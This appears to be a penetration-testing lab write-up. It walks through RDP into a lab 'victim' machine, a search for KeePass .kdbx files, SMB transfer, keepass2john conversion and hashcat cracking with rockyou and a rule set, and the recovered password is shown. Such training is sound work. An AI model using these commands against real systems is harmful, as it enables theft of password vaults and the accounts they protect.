Questions 1
Follow the steps outlined in this section to obtain the master password of the KeePass database on VM #1 (SALESWK01). Enter the password found with the title "User Company Password".

# RDP into the victim pc
xfreerdp /u:jason /p:lab /v:192.168.190.203 /drive:smbfolder,/home/kali/Desktop

# Open Powershell retrieve *.kdbx file 
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Transfer the .kdbx file to our Kali system using SMB 

We have now completed the first step of the cracking methodology and can proceed to the next step, transforming the hash into a format our cracking tool can use.
JohntheRipper suite includes various transformation scripts like ssh2john4 and keepass2john,5 which can format a broad range of different file formats

# Here will keepass2john script to format the database file
keepass2john Database.kdbx > keepass.hash

# here the output of the hash will see the 'Database:$keepass$...' which 'Database:' is not needed
cat keepass.hash
nano keepass.hash # remove database prefix
cat keepass.hash # make sure the prefix is removed

# Find the hash type for KeePass. We can lookup it in the Hashcat Wiki
hashcat --help | grep -i "KeePass"
13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES)         | Password Manager

# We'll use one of the Hashcat-provided rules (rockyou-30000.rule), as mentioned earlier, combined with the rockyou.txt wordlist.
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
...
63ee920277496c1:qwertyuiop123!
...

Back to the Victim machine open the .kdbx file and use the password above. 
User company password found!


